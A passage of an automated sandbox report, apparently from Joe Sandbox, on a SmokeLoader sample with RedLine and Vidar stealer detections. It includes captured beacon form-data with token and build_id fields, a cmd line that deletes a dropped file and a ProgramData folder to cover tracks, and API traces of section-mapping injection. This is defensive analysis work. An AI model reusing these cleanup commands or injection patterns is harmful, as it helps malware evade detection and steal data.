                                                                              2024-05-26 08:23:51 UTC | 331 | OUT | Data Ascii: ------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------EHJKJDGCGDAKFHIDBGCBContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------EHJKJDGCGDAKFHIDBGCBCont
                                                                              2024-05-26 08:23:51 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:51 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:51 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                              Data Ascii: 0



                                                                              Target ID:0
                                                                              Start time:04:21:53
                                                                              Start date:26/05/2024
                                                                              Path:C:\Users\user\Desktop\4.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\4.exe"
                                                                              Imagebase:0x400000
                                                                              File size:240'128 bytes
                                                                              MD5 hash:73DDF9A7F42E0452B6AA00F4E0A0AFD5
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1712388101.0000000002DE0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000000.00000002.1712494428.0000000002E51000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:04:21:58
                                                                              Start date:26/05/2024
                                                                              Path:C:\Windows\explorer.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\Explorer.EXE
                                                                              Imagebase:0x7ff72b770000
                                                                              File size:5'141'208 bytes
                                                                              MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:5
                                                                              Start time:04:22:21
                                                                              Start date:26/05/2024
                                                                              Path:C:\Users\user\AppData\Roaming\sdveeeu
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Roaming\sdveeeu
                                                                              Imagebase:0x400000
                                                                              File size:240'128 bytes
                                                                              MD5 hash:73DDF9A7F42E0452B6AA00F4E0A0AFD5
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1997200798.0000000002E41000.00000004.10000000.00040000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000005.00000002.1997135222.0000000002E10000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: JoeSecurity_SmokeLoader_2, Description: Yara detected SmokeLoader, Source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: Windows_Trojan_Smokeloader_4e31426e, Description: unknown, Source: 00000005.00000002.1997158048.0000000002E20000.00000004.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000005.00000002.1997359017.000000000300B000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 39%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:6
                                                                              Start time:04:22:31
                                                                              Start date:26/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\F441.exe
                                                                              Imagebase:0x400000
                                                                              File size:325'120 bytes
                                                                              MD5 hash:EA9DD1EAE2E521666D3F06382104EC10
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000006.00000002.2557763038.00000000004FE000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                              • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000006.00000002.2558343194.00000000020F0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Avira
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              • Detection: 96%, ReversingLabs
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:8
                                                                              Start time:04:23:02
                                                                              Start date:26/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\9EDA.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\9EDA.exe
                                                                              Imagebase:0x400000
                                                                              File size:2'121'216 bytes
                                                                              MD5 hash:7BDE08F5DD2A433DAE25A8F8B3E70970
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:Borland Delphi
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000008.00000002.2367767500.00000000044D0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: INDICATOR_SUSPICIOUS_EXE_WindDefender_AntiEmaulation, Description: Detects executables containing potential Windows Defender anti-emulation checks, Source: 00000008.00000002.2367654116.0000000004490000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                              • Rule: JoeSecurity_Crypt, Description: Yara detected CryptOne packer, Source: 00000008.00000002.2367245852.0000000004299000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000008.00000002.2367245852.0000000004190000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                              Antivirus matches:
                                                                              • Detection: 100%, Joe Sandbox ML
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:04:23:05
                                                                              Start date:26/05/2024
                                                                              Path:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              Imagebase:0x400000
                                                                              File size:881'664 bytes
                                                                              MD5 hash:66064DBDB70A5EB15EBF3BF65ABA254B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Antivirus matches:
                                                                              • Detection: 4%, ReversingLabs
                                                                              Reputation:moderate
                                                                              Has exited:true

                                                                              Target ID:12
                                                                              Start time:04:23:12
                                                                              Start date:26/05/2024
                                                                              Path:C:\Windows\SysWOW64\WerFault.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 3192 -s 1640
                                                                              Imagebase:0xde0000
                                                                              File size:483'680 bytes
                                                                              MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:14
                                                                              Start time:04:23:52
                                                                              Start date:26/05/2024
                                                                              Path:C:\Windows\SysWOW64\cmd.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\System32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Temp\kat796E.tmp" & rd /s /q "C:\ProgramData\HJJJECFIECBG" & exit
                                                                              Imagebase:0x240000
                                                                              File size:236'544 bytes
                                                                              MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:15
                                                                              Start time:04:23:52
                                                                              Start date:26/05/2024
                                                                              Path:C:\Windows\System32\conhost.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                              Imagebase:0x7ff7699e0000
                                                                              File size:862'208 bytes
                                                                              MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:16
                                                                              Start time:04:23:52
                                                                              Start date:26/05/2024
                                                                              Path:C:\Windows\SysWOW64\timeout.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:timeout /t 10
                                                                              Imagebase:0x660000
                                                                              File size:25'088 bytes
                                                                              MD5 hash:976566BEEFCCA4A159ECBDB2D4B1A3E3
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                                Execution Graph

                                                                                Execution Coverage:7.6%
                                                                                Dynamic/Decrypted Code Coverage:43.7%
                                                                                Signature Coverage:40.3%
                                                                                Total number of Nodes:119
                                                                                Total number of Limit Nodes:5

                                                                                Control-flow Graph

                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: Section$CreateDuplicateObjectView
                                                                                • String ID:
                                                                                • API String ID: 1652636561-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401725
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 00401743
                                                                                • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 00401784
                                                                                • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 004017B5
                                                                                • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 004017D7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: Section$View$Create$DuplicateObject
                                                                                • String ID:
                                                                                • API String ID: 1546783058-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02EF20F5
                                                                                • Module32First.KERNEL32(00000000,00000224), ref: 02EF2115
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2eeb000_4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                • String ID:
                                                                                • API String ID: 3833638111-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02DD024D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2dd0000_4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID: cess$kernel32.dll
                                                                                • API String ID: 4275171209-1230238691

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • SetErrorMode.KERNELBASE(00000400,?,?,02DD0223,?,?), ref: 02DD0E19
                                                                                • SetErrorMode.KERNELBASE(00000000,?,?,02DD0223,?,?), ref: 02DD0E1E
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2dd0000_4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorMode
                                                                                • String ID:
                                                                                • API String ID: 2340568224-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0

                                                                                Control-flow Graph

                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 479 4019ee-4019f6 480 4019f8-401a0b 479->480 484 401a60 480->484 485 401a06-401a48 call 4012a9 Sleep call 401524 480->485 484->480 486 401a62 484->486 494 401a57-401a6f 485->494 514 401a4a-401a52 call 401615 485->514 488 401a53 486->488 489 401a64 486->489 488->494 491 401a66-401a6b 489->491 492 401ace-401b1c call 4012a9 489->492 497 401a72-401aa7 call 4012a9 491->497 521 401b21 492->521 494->497 506 401a65-401a6b 494->506 506->497 514->488 521->521
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 522 4019fa-4019fc 524 4019f3 522->524 525 4019ff-401a0b 522->525 527 4019f8 524->527 529 401a60 525->529 530 401a06-401a48 call 4012a9 Sleep call 401524 525->530 527->525 529->527 531 401a62 529->531 539 401a57-401a6f 530->539 559 401a4a-401a52 call 401615 530->559 533 401a53 531->533 534 401a64 531->534 533->539 536 401a66-401a6b 534->536 537 401ace-401b1c call 4012a9 534->537 542 401a72-401aa7 call 4012a9 536->542 566 401b21 537->566 539->542 551 401a65-401a6b 539->551 551->542 559->533 566->566
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 567 401a09-401a48 call 4012a9 Sleep call 401524 576 401a57-401a6f 567->576 577 401a4a-401a53 call 401615 567->577 582 401a72-401aa7 call 4012a9 576->582 583 401a65-401a6b 576->583 577->576 583->582
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 592 401a10-401a48 call 4012a9 Sleep call 401524 598 401a57-401a6f 592->598 599 401a4a-401a53 call 401615 592->599 604 401a72-401aa7 call 4012a9 598->604 605 401a65-401a6b 598->605 599->598 605->604
                                                                                APIs
                                                                                • Sleep.KERNELBASE(00001388), ref: 00401A33
                                                                                  • Part of subcall function 00401615: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004016D5
                                                                                  • Part of subcall function 00401615: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401702
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd
                                                                                Similarity
                                                                                • API ID: CreateDuplicateObjectSectionSleep
                                                                                • String ID:
                                                                                • API String ID: 4152845823-0
                                                                                APIs
                                                                                • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02EF1DDD
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2eeb000_4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: AllocVirtual
                                                                                • String ID:
                                                                                • API String ID: 4275171209-0
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2dd0000_4.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: .$GetProcAddress.$l
                                                                                • API String ID: 0-2784972518
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712643211.0000000002EEB000.00000040.00000020.00020000.00000000.sdmp, Offset: 02EEB000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2eeb000_4.jbxd
                                                                                Yara matches
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1712353745.0000000002DD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02DD0000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_2dd0000_4.jbxd
                                                                                Yara matches
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1711200857.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_400000_4.jbxd

                                                                                Execution Graph

                                                                                Execution Coverage:7.6%
                                                                                Dynamic/Decrypted Code Coverage:43.7%
                                                                                Signature Coverage:0%
                                                                                Total number of Nodes:119
                                                                                Total number of Limit Nodes:5

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
                                                                                control_flow_graph 85 401524-401556 92 401563-40156c call 4012a9 85->92 97 401593-40159b 92->97 98 40156e-401580 92->98 99 40159d-4015a0 97->99 100 401582-401589 98->100 101 4015fd-401612 98->101 104 4015a2-4015a4 99->104 105 4015e9-4015ef 99->105 102 401560 100->102 103 40158b-40158d 100->103 106 401639-40165a 101->106 102->92 107 401590-401592 103->107 108 4015a6-4015c7 104->108 109 4015f7 104->109 105->109 115 40165d-401670 call 4012a9 106->115 116 40164e-401656 106->116 107->97 111 401643 108->111 112 4015c9 108->112 109->101 111->106 112->107 114 4015cb 112->114 114->99 117 4015cd 114->117 120 401672 115->120 121 401675-40167a 115->121 116->115 117->105 120->121 123 401680-401691 121->123 124 401991-401999 121->124 127 401697-4016c0 123->127 128 40198f-4019e0 call 4012a9 123->128 124->121 127->128 136 4016c6-4016dd NtDuplicateObject 127->136 136->128 137 4016e3-401707 NtCreateSection 136->137 140 401763-401789 NtCreateSection 137->140 141 401709-40172a NtMapViewOfSection 137->141 140->128 142 40178f-401793 140->142 141->140 144 40172c-401748 NtMapViewOfSection 141->144 142->128 145 401799-4017ba NtMapViewOfSection 142->145 144->140 146 40174a-401760 144->146 145->128 148 4017c0-4017dc NtMapViewOfSection 145->148 146->140 148->128 150 4017e2 call 4017e7 148->150
                                                                                Memory Dump Source
                                                                                • Source File: 00000005.00000002.1994309772.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_5_2_400000_sdveeeu.jbxd

                                                                                Control-flow Graph

                                                                                • Executed
                                                                                • Not Executed
